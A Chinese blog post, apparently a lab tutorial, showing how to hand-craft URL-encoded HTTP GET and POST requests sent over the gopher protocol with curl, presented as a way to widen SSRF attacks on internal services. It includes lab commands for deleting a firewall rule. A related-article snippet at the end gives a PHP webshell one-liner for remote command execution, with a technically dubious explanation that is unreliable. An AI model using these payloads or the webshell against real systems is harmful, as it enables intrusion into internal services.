gopher协议发起GET/POST请求

最新推荐文章于 2024-02-20 15:55:27 发布
最新推荐文章于 2024-02-20 15:55:27 发布
阅读量1.2k 收藏 12
点赞数 31
文章标签: php web安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/HOU_XIAO_BAI/article/details/134653080
版权

gopher协议


Gopher协议是一种早期的互联网协议,用于在网络上获取文本信息。它于1991年提出,旨在提供一种简单、高效的方式来浏览和访问文件。

Gopher协议使用类似于文件系统的层次结构来组织数据,其中每个项目都有一个唯一的标识符。通过Gopher客户端软件,用户可以浏览目录并选择下载或查看文件。Gopher服务器可以提供文本文件、图像文件、二进制文件等。

与HTTP相比,Gopher协议具有更简单的设计和较少的功能。它基于传输控制协议(TCP)进行通信,默认端口号为70。然而,随着万维网的崛起和HTTP的普及,Gopher协议逐渐被取代。

利用


利用gopher协议可以攻击内网的 Redis、Mysql、FastCGI、Ftp 等,也可以发送 GET、POST 请求,这可以拓宽 SSRF 的攻击面。
 

测试环境条件:

两台虚拟机,centos、ubuntu。

centos发起端口监听。

ubuntu发起请求。

centos:

如果没有nc,那么安装一个

 apt-get install -y nc

先查看centos的ip地址,测试ubuntu是否可以ping通。

启动监听,监听9527端口

 nc -lp 9527

ubuntu:

发起请求

  curl gopher://172.16.129.74:9527/_abcd

centos那边会有abcd的,因为会吞掉第一个字符,所以写一个_。

注意!

如果不成功。可能是防火墙的策略问题,关闭REJECT.

iptables -L INPUT --line-numbers

输入:

iptables -D INPUT 11

11为REJECT的id

然后开启监听,ubuntu进行访问输入。

GET请求

使用gopher协议,环境为:

centos发起端口监听。ubuntu发起请求。

条件前提:可以互相ping通、关闭防火墙里面的icmp协议。

(参考上文)

centos开启docker 启动lamp(这边设置的根目录是app)

docker run -d --name=lamp -p 80:80 -p 3306:3306  -v /app:/app docker.io/mattrayner/lamp(运行容器)

进入app写一个文件

touch get.php

在get.php里面输入:

<?php echo "hello".$_GET['name']; ?>

centos启动监听,监听9527端口

 nc -lp 9527

ubuntu发起get请求。

书写一个GET的HTTP包,进行URL编码。,并且将回车换行替换为%0d%0a

GET /ssrf/get.php?name=hsj HTTP/1.1

Host:172.16.129.74

url编码后:

GET%20%2Fssrf%2Fget.php%3Fname%3Dhsj%20HTTP%2F1.1%0AHost%3A172.16.129.74

并且将回车换行替换为%0d%0a结尾也要有。

GET%20%2Fssrf%2Fget.php%3Fname%3Dhsj%20HTTP%2F1.1%0d%0aHost%3A172.16.129.74%0d%0a

GET%20%2Fssrfget.php%3Fname%3Dhsj%20HTTP%2F1.1%0d%0aHost%3A172.16.129.74%0d%0a

 

提示权限不够。

关闭lamp

docker stop lamp

删除

 docker rm lamp

查看是否删除成功

 docker ps

 

开启挂载到root/www目录下面。

docker run -d -p 80:80 -v /root/www:/app --name ssrf docker.io/mattrayner/lamp

 

创建一个www的目录,写入一个文件

在防火墙里面将root/www设置成白名单。

输入:

 curl http://127.0.0.1/123.txt

成功访问。

 

然后就和上面步骤一样,在www目录下面设置一个get.php文件,使用vim写入代码

<?php echo "hello".$_GET['name']; ?>

 

写http包

GET /get.php?name=hsj HTTP/1.1

Host:172.16.129.74

URL编码

GET%20%2Fget.php%3Fname%3Dhsj%20HTTP%2F1.1%0d%0aHost%3A172.16.129.74%0d%0a

 

输入:

 curl gopher://172.16.129.74:80/GET%20%2Fget.php%3Fname%3Dhsj%20HTTP%2F1.1%0d%0aHost%3A172.16.129.74%0d%0a

POST请求

和get前提条件一样。

新建,post.php

插入。

保存,查看。

构造POST数据包

POST /post.php HTTP/1.1

host:172.16.129.74

Content-Type:application/x-www-form-urlencoded

Content-Length:8

name=HXB

URL编码

POST%20%2Fpost.php%20HTTP%2F1.1%0d%0ahost%3A172.16.129.74%0d%0aContent-Type%3Aapplication%2Fx-www-form-urTencoded%0d%0aContent-Length%3A8%0d%0a%0d%0aname%3DHXB%0d%0a

 

输入:

curl gopher://172.16.129.74:80/_POST%20%2Fpost.php%20HTTP%2F1.1%0d%0ahost%3A172.16.129.74%0d%0aContent-Type%3Aapplication%2Fx-www-form-urlencoded%0d%0aContent-Length%3A8%0d%0a%0d%0aname=HXB%0d%0a

 curl gopher://172.16.129.74:80/_POST%20/post.php%20HTTP/1.1%0D%0Ahost:192.168.58.131%0D%0AContent-Type:application/x-www-form-urlencoded%0D%0AContent-Length:8%0D%0A%0D%0Aname=HSJ%0D%0A

 

侯小白哥哥
关注
  • 31
    点赞
  • 12
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
穿越数字时光隧道:深入探索Gopher协议的遗产与现实
Von_016's Blog
02-29 875
Gopher是一种分布式文档搜索和检索协议,它允许用户通过菜单驱动的接口浏览或搜索互联网上的信息。Gopher协议于1991年在明尼苏达大学由一个由Mark P. McCahill领导的团队开发。Gopher的设计目标是创建一个简单、高效且易于使用的互联网信息查找工具。
SSRF学习(4)Gopher协议POST请求
m0_64417923的博客
05-13 1185
和前两题一样,先使用file:///协议 http://127.0.0.1/flag.php 得到一个输入框 右键查看源代码: 得到key key=f80bb4e68df72b3f98569b958219be05 所以应该是通过key进入,从而得到flag,但是没有提交的按钮,所以我们要自己构造post请求,将这个key发送过去。 用gopher协议构造post请求: <?php ​ error_reporting(0); ​ if ($_SERVER["REM...
使用curl工具通过Gopher协议发送GET请求
Thegentlest的博客
08-25 980
使用curl工具通过Gopher协议发送GET请求
SSRF基础:Gopher协议发送Get和Post请求
weixin_45887311的博客
07-13 5411
为了调试方便,我在win10下安装curl的工具 下载地址:https://curl.haxx.se/download.html 但目前提供的版本已经不支持gopher协议了,所以我千辛万苦找到了7.60的win64版本,支持发送gopher,dict协议 7.60地址:https://wws.lanzous.com/iaV55ekyfjc 点击即可下载 解压后把bin目录加入windows环境变量 一、什么是gopher协议? 定义:Gopher是Inter...
Gopher协议
qq_43665434的博客
03-26 4085
Gopher协议 本文参考Margin大佬文章 什么是Gopher协议? 定义:Gopher是Internet上一个非常有名的信息查找系统,它将Internet上的文件组织成某种索引,很方便地将用户从Internet的一处带到另一处。在WWW出现之前,Gopher是Internet上最主要的信息检索工具,Gopher站点也是最主要的站点,使用tcp70端口。但在WWW出现后,Gopher失去了昔日的辉煌。现在它基本过时,人们很少再使用它; gopher协议支持发出GET、POST请求:可以先截获get请
SSRF利用协议中的万金油——Gopher
qq_50854662的博客
02-23 3116
SSRF利用协议中的万金油——Gopher
ssrf中gopher协议的利用
V
10-29 5625
SSRF漏洞如何产生 SSRF(Server-Side Request Forgery:服务器端请求伪造)是一种由攻击 者构造形成由服务端发起请求的一个安全漏洞。一般情况下,SSRF是 能够直接对目标网站的内部系统发起请求。(因为他是从内部系统访 问的,所以可以通过它攻击外网无法访问的内部系统,也就是把目标 网站当中间人) gopher协议的利用 gopher 协议 Gopher是Internet...
SSRF(3)伪协议读取文件&Gopher协议的利用
m0_64417923的博客
05-12 4091
一:Http、Dict和file等协议的利用 1,内网访问 所以构造: /?url=http://127.0.0.1/flag.php 得到: ctfhub{ce475b59a4baee959112777b} 2,伪协议读取文件 最经典的PHP协议就是file:///协议了,可以用来读取php源码 构造payload: /?url=file:///var/www/html/flag.php 得到: 在单击右键查看源代码: 得到flag: ctfh..
api实现http请求,支持post和get方法
02-23
接着,对于POST请求,使用HttpOpenRequest指定请求类型为POST,并设置请求头,通过HttpSendRequest发送数据;对于GET请求,HttpOpenRequest的请求类型设为GET即可。在请求完成后,通过InternetReadFile读取服务器...
[RFC2616-HTTP/1.1 超文本传输协议](翻译)[Part 1]
PiPiQ_Blog的博客
02-15 3778
原文:RFC 2616 - Hypertext Transfer Protocol -- HTTP/1.1 (ietf.org) (因本篇RFC较长,将其分为几篇文章进行翻译) 超文本传输​​协议——HTTP/1.1 超文本传输​​协议 (HTTP) 是分布式、协作、超媒体信息系统的应用层协议。它是一种通用的、无状态的协议,通过扩展其请求方法、错误代码和标头 [47],可用于超文本之外的许多任务,例如名称服务器和分布式对象管理系统。 HTTP 的一个特性是数据表示的类型化和协商,允许独立于正在传输的数
SSRF漏洞
安全脑
07-02 1020
漏洞介绍 服务端请求伪造攻击(Server-side Request Forgery)简称SSRF,是一种由攻击者构造形成由服务端发起请求的一个安全漏洞。一般情况下,SSRF攻击的目标是从外网无法访问的内部系统(正是因为它是由服务端发起的,所以它能够请求到与它相连而与外网隔离的内部系统),当WEB应用提供了从其他服务器获取数据的功能,但没有远程服务器地址和远程服务器返回的信息进行合理的验证和过滤,就可能存在SSRF,致使可以利用发起网络请求的服务来攻击其他服务。 SSRF与CSRF的区别 CSRF是服
【网络安全 | HTTP】 gopher协议原理、语法及利用总结
等风来
08-01 9277
Gopher协议是一种早期的互联网协议,用于在网络上获取文本信息。它于1991年提出,旨在提供一种简单、高效的方式来浏览和访问文件。Gopher协议使用类似于文件系统的层次结构来组织数据,其中每个项目都有一个唯一的标识符。通过Gopher客户端软件,用户可以浏览目录并选择下载或查看文件。Gopher服务器可以提供文本文件、图像文件、二进制文件等。与HTTP相比,Gopher协议具有更简单的设计和较少的功能。它基于传输控制协议(TCP)进行通信,默认端口号为70。
gopher协议总结
unexpectedthing的博客
12-01 6297
定义 gopher协议是一种信息查0找系统,他将Internet上的文件组织成某种索引,方便用户从Internet的一处带到另一处。在WWW出现之前,Gopher是Internet上最主要的信息检索工具,Gopher站点也是最主要的站点,使用tcp70端口。利用此协议可以攻击内网的 Redis、Mysql、FastCGI、Ftp等等,也可以发送 GET、POST 请求。这拓宽了 SSRF 的攻击面 利用: 攻击内网的 Redis、Mysql、FastCGI、Ftp等等,也可以发送 GET、POST 请求
SSRF漏洞详解(全面)
最新发布
m0_64481831的博客
02-20 1467
SSRF往往是因为没有对目标地址进行过滤或限制SSRF相关的危险函数:file_get_contents()、fsockopen()、curl_exec()SSRF相关危险协议:file://、dict://、http://、万精油gopher://SSRF几大绕过:利用[::]绕过、利用@或。绕过、利用短地址绕过、利用IP地址转换绕过、利用一些特殊符号绕过SSRF判断方法分为有回显、半回显、无回显情况,无回显情况利用DNS带外测试。
漏洞篇(SSRF 服务器端请求伪造)
m0_58001548的博客
04-19 896
SSRF(Server-Side Request Forgery:服务器端请求伪造)通过篡改 HTTP 请求中的资源地址发送给服务器,服务器没有校验请求的合法性,服务器解析用户传递过来的请求,处理之后返回给用户。例如:1. HTTP 请求:www.xuegod.cn/xxx.php?2. 服务器接收到请求之后获取图片3. 服务器获取到图片后将图片返回给用户。问题产生在第二步,服务器会向第三方站点发送请求并获取资源文件,如果网站对资源文件的地址没。
ssrf之gopher协议的使用和配置,以及需要注意的细节
qq_59020256的博客
12-30 1523
如果说要长期得到则需要在vim /etc/selinux/config 里面将enforcing改为disabled。RL:gopher://<host>:<port>/<gopher-path>_ 后接TCP数据流。如果发起post请求,回车换行需要使用%0d%0a,如果多个参数,参数之间的&也需要进行URL编码。这里需要注意当出现403报错时需要输入 setenforce 0可以暂时得到root权限。创建一个post请求php代码如下。创建一个get请求php代码如下。将如下代码进行url编码。
SSRF深度解析Gopher协议
qq_60115503的博客
04-25 4710
定义:Gopher是Internet上一个非常有名的信息查找系统,它将Internet上的文件组织成某种索引,很方便地将用户从Internet的一处带到另一处。在WWW出现之前,Gopher是Internet上最主要的信息检索工具,Gopher站点也是最主要的站点,使用tcp70端口。但在WWW出现后,Gopher失去了昔日的辉煌。现在它基本过时,人们很少再使用它;
使用gopher协议webshell
06-06
Gopher 协议是一个老式的网络协议,它主要用于文本传输和文件下载。由于一些历史原因,Gopher 协议在一些场景下仍然有用处,例如绕过一些防火墙和安全设备。在某些情况下,可以利用 Gopher 协议来写 Webshell,从而实现远程命令执行和文件上传等功能。 下面是一个简单的 Gopher Webshell 例子: 1. 创建一个 PHP 脚本,将其编码为 base64 格式,假设文件名为 `shell.php`。 2. 将编码后的 PHP 脚本内容插入到 Gopher URL 中,形如 `gopher://hostname:port/_<base64-encoded-php-script>`。 3. 在浏览器或者 curl 等工具中访问该 Gopher URL,即可触发 PHP 脚本执行,从而实现远程命令执行和文件上传等功能。 例如,可以使用以下命令在 Linux 系统上写入一个 Gopher Webshell: ``` echo '<?php system($_GET["cmd"]) ?>' | base64 | xargs printf "GET /_%s HTTP/1.0\r\n\r\n" | nc hostname port ``` 其中,`hostname` 和 `port` 分别为目标主机和端口号,`cmd` 为远程命令执行参数。此时,访问 `gopher://hostname:port` 即可执行远程命令。 需要注意的是,使用 Gopher 协议Webshell 存在一些风险,容易被防火墙和安全设备识别和拦截。此外,由于 Gopher 协议已经过时,一些浏览器和工具可能不支持 Gopher URL。因此,在实际应用中,需要根据具体情况进行选择和调整。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值